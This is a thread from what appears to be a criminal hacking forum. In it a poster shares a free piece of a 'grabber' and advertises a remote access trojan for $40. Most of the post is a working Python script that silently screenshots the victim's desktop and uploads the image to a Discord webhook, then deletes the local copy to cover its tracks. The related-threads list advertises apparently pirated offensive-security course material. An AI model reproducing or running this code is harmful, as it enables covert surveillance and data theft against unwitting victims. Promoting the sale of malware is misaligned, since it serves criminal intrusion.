Temporary Advertisements:
Ad
Ad
Ad
a free part of my grabber
by stackunderflow - Wednesday June 5, 2024 at 10:02 AM
#1
im working on a rat in like 3 days it will be done i will sell it for 40$ lifetime dm me

null
import os
from discord_webhook import DiscordWebhook, DiscordEmbed
from PIL import ImageGrab
user = os.path.expanduser("~")
hook =""
def screen():
    sss = ImageGrab.grab()
    temp_path = os.path.join(user, "AppData\\Local\\Temp\\ss.png")
    sss.save(temp_path)
    webhook = DiscordWebhook(url=hook)
    embed = DiscordEmbed(title="Screenshot", description="Latest screenshot capture.", color=242424)
    embed.set_author(name="kggrabber", icon_url="")
    embed.set_image(url="")
    embed.set_footer(text="kalogz on breachforums")
    webhook.add_embed(embed)
    webhook.execute()
    webhook = DiscordWebhook(url=hook)
    with open(temp_path, "rb") as f:
        webhook.add_file(file=f.read(), filename='ss.png')
    webhook.execute()
    try:
        os.remove(temp_path)
    except Exception as e:
        print(f"Error removing file: {e}")
screen()
Reply
#2
bro please .......

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Arrested
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Top Telegram Channels list [2025] j3n1n 3,326 109,920 2 hours ago
Last Post: viper303
  [FREE] Corelan exploit dev bootcamp - OSED-like buffer overflow, ASLR, heap spraying. Tamarisk 359 38,323 4 hours ago
Last Post: loveipa
  [MEGA] Altered Security - Certified Red Teaming Expert (CRTE) protomesl 480 19,480 6 hours ago
Last Post: maddie1
  [PDF] OSCP Exam preparation pdfs cam3lsoft 341 14,842 6 hours ago
Last Post: maddie1
  [FREE] Latest OSEP / PEN-300 - complete course PDF + videos Tamarisk 1,079 102,708 6 hours ago
Last Post: maddie1

Forum Jump:


 Users browsing this forum: 1 Guest(s)